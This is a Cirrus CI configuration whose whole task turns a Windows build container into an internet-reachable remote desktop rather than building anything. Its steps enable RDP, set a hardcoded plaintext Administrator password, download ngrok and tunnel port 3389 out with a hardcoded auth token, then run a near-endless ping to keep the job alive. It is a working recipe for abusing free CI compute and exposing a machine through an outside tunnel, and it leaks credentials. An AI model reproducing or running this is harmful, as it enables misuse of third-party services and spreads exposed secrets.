windows_container:
  image: cirrusci/windowsservercore:2019
  cpu: 4
  memory: 12G

task:
  script:
    - ps: cmd reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
    - ps: Set-LocalUser -Name "Administrator" -Password (ConvertTo-SecureString -AsPlainText Pin1596@ -Force)
    - ps: Get-LocalUser -Name "Administrator" | Enable-LocalUser
    - ps: Invoke-WebRequest https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-windows-amd64.zip -OutFile ngrok.zip
    - ps: tar xf ngrok.zip
    - ps: Copy ngrok.exe C:\Windows\System32
    - ps: cmd /c echo ./ngrok.exe authtoken 1sG77Yu0gc4U9QRyEW9BIpjAh1W_LQNFV9NyQWekE68tiHKK >a.ps1
    - ps: cmd /c echo cmd /k start ngrok.exe tcp 3389 >>a.ps1
    - ps: cmd /c echo ping -n 999999 10.10.10.10 >>a.ps1
    - ps: .\a.ps1
